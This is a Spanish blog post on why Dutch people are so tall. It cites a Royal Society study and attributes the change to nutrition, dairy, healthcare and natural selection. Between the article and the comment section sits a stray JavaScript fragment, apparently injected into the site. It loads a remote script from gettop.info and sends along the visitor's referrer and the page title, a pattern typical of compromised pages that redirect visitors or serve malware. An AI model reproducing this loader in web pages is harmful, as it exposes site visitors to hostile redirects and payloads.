Salud y belleza » Salud, Seguros de salud, alimentos

Por qué los holandeses son tan altos

Sin Comentarios

En el siglo XVIII los holandeses eran los más bajos de Europa con una estatura de solo 1.65 metros y en poco más de 150 años han pasado a ser de los más altos con una media de 1.84 metros en los hombres y de 1.71 metros en las mujeres.

holandeses-altos

Los holandeses son los más altos del planeta, pero no siempre lo han sido. Según un estudio realizado por la revista científica británica Royal Society, la causa de su aumento de estatura radicaría en que viven en un entorno favorable y también en la selección natural.

Su aumento de estatura se debería a la buena alimentación, con un importante consumo de productos lácteos y también al buen acceso a la sanidad. Además, la selección natural ha podido contribuir a favorecer una mayor altura entre los holandeses. Según este estudio, las personas que tuvieron más hijos fueron los hombres más altos y las mujeres de estatura media.

¿Por qué crees que los holandeses son tan altos?

document.currentScript.parentNode.insertBefore(s, document.currentScript);s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Más consejos de salud y belleza : , ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.